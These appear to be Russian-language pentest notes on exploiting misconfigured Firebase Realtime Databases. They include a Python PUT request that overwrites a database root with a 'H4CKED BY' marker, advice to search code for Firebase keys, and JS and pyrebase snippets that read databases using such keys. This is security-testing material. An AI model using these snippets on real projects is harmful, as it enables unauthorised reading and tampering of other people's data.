Firebase

Если кратко

Пробуем

https://<databasename>.firebaseio.com/.json

Другой пример

import requests
data= {"Exploit":"Successfull", "H4CKED BY": "zfr"}
reponse = requests.put("https://my-proj.firebaseio.com/.json", json=data)

Если потом через Get сможем запросить — уязвимо: https://hackerone.com/reports/1065134

Firebase Database Takeover

Пример пентеста с плохо сконфигурированной базой - https://medium.com/@danangtriatmaja/firebase-database-takover-b7929bbb62e1

Пример поиска и эксплуатации ключей Firebase

Ищем по коду подобные константы:

Firebase Realtime Database

Эта база не только для сбора аналитики, ее используют как API Gateway / Message Broker (клиенты общаются с базой Firebase, а не с сервером напрямую, а сервер читает запросы из базы и возвращает в базу ответы, которые уже клиент потом вычитывает)

https://firebase.google.com/docs/database?authuser=0

Используем официальный клиент firebase

Тут важно разузнать, какой версии API используется в проекте

Это старое API (^8.10.1, с ref и push/key/once):

'use client'
import { FC, useEffect } from "react";

const Comp: FC = () => {
  useEffect(() => {

    (async () => {
      // импорт только в браузере
      const firebase = (await import("firebase/app")).default;
      // 2. Подключаем нужный сервис — Realtime Database
      await import("firebase/database");
      // при необходимости подтягиваем нужные модули:
      // await import("firebase/firestore");
      // await import("firebase/auth");
      const firebaseConfig = {
        apiKey: "AIzaS***i_HNPi_w",
        authDomain: "firebase-my-project.firebaseapp.com",
        projectId: "firebase-my-project",
        databaseURL: 'https://my-project.firebaseio.com'
      };

      // чтобы не инициализировать повторно при Fast Refresh
      if (!firebase.apps.length) {
        firebase.initializeApp(firebaseConfig);
      }
      let db = firebase.database()
      let path = `some-data-key`

      // Это аналог post-запроса: отправляем данные, получаем ключ на чтение ответа.
      // Как прочитать ответ по ключу, не разобрался
      const t = db.ref(path).push().key;

      // Это пример чтения значения по ключу (аналог get-запроса)
      try {
            const name = await db
            .ref(path)
            .once("value")
            .then((s) => console.log(s.val()))
            .catch(error => console.log(error))
            .finally(() => console.log('END'));
            return name;
        } catch (e) {
            console.log("e", e);
            return null;
      }

    })();
  }, []);

  return <div>Comp</div>;
};

export default Comp

Новое API выглядит как-то так:

    //   async function loadCollection() {
    //     const snapshot = await db.collection("users").get();

    //         snapshot.forEach(doc => {
    //         console.log("id:", doc.id);
    //         console.log("data:", doc.data()); // все поля этого документа
    //         });
    //     }

Используем pyrebase

Пример работы с firebase базой с помощью pip install pyrebase

import pyrebase

config = {
  "apiKey": "FIREBASE_API_KEY",
  "authDomain": "FIREBASE_AUTH_DOMAIN_ID.firebaseapp.com",
  "databaseURL": "https://FIREBASE_AUTH_DOMAIN_ID.firebaseio.com",
  "storageBucket": "FIREBASE_AUTH_DOMAIN_ID.appspot.com",
}

firebase = pyrebase.initialize_app(config)

db = firebase.database()

print(db.get())

Этот код отработает, если выставлены permissions на чтение для apiKey

В документации pyrebase можно найти другие примеры по работе с Firebase.